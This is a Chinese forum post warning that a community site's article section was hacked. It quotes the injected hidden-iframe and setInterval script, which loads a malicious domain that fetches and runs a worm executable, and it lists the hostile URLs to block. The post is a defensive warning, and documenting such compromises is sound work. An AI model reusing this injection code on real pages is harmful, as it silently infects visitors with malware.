赞 | 0 |
VIP | 22 |
好人卡 | 0 |
积分 | 1 |
经验 | 256242 |
最后登录 | 2012-7-8 |
在线时间 | 75 小时 |
Lv1.梦旅人 輪廻の魔女
- 梦石
- 0
- 星屑
- 50
- 在线时间
- 75 小时
- 注册时间
- 2005-10-23
- 帖子
- 4479
|
以下引用精灵使者于2009-3-8 0:16:52的发言:
确认提示有马,而且有一个OK1.EXE被遨游拦截。
经精灵亲自侦测,2008年3月7日晚上23时55分左右主站的文章分类下被挂马,打开文章分区以后进入以下页面:
- <iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><script>function re(){document.write('<iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe>');}setInterval('re()',9000);</script><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe>
复制代码
主要下载并执行文件:
http://w1.getdew.cn/01/ok1.exe并且运行。
经NOD报毒为win32/autorunADC 蠕虫的变种病毒。
所以大家访问的时候请将下列网站加入屏蔽列表并且加入不信任区域:
http://v.6t56r.cn/
http://w1.getdew.cn/
由于这些网站为病毒网站,所以请将其改为小写并加入屏蔽列表,切记!
精灵将密切关注此事。
在此帖出现之后精灵发疯般满世界找柳子…… |
|